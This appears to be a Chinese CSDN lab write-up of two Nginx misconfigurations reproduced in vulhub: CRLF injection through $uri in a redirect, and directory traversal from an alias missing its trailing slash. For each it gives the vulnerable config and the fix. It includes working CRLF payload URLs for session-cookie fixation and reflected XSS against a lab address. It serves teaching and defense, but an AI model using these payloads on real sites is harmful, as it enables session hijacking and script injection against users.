Nginx配置不当(CRLF注入 、目录穿越)

基于vulhub漏洞环境
环境搭建参考:https://blog.csdn.net/qq_36374896/article/details/84102101

1.漏洞名称

CRLF注入

2.漏洞原理

Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。
错误的配置文件示例(原本的目的是为了让http的请求跳转到https上):
location / {
    return 302 https://$host$uri;
}

3.漏洞利用

启动环境
cd /vulhub-master/nginx/insecure-configuration
sudo docker-compose up

在这里插入图片描述
访问 192.168.91.130:8080
正常跳转
在这里插入图片描述

会话固定

payload

http://192.168.91.130:8080/%0ASet-cookie:JSPSESSID%3D360

发送包
在这里插入图片描述
返回包
在这里插入图片描述
反射性XSS
payload

http://192.168.91.130:8080/%0D%0A%0D%0A%3Cimg%20src=1%20onerror=alert(/xss/)%3E

发送包
在这里插入图片描述
返回包
在这里插入图片描述
为什么没弹窗?
浏览器Filter对XSS特征进行了过滤,并且浏览器进行了跳转如何阻止浏览器跳转,参考链接:
https://www.leavesongs.com/PENETRATION/bottle-crlf-cve-2016-9964.html
https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html

4.漏洞修复

使用不解码的URI跳转

location /{
return 302 https://$host$request_uri
}

1.漏洞名称

目录穿越

2.漏洞原理

Nginx在配置别名(Alias)的时候,如果忘记加/,将造成一个目录穿越漏洞。
错误的配置文件示例(原本的目的是为了让用户访问到/home/目录下的文件):

location /files {
    alias /home/;
}

3. 利用方法

正常访问
在这里插入图片描述
穿越上层目录
在这里插入图片描述

4. 漏洞修复

在这里插入图片描述

在这里插入图片描述

加上/

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值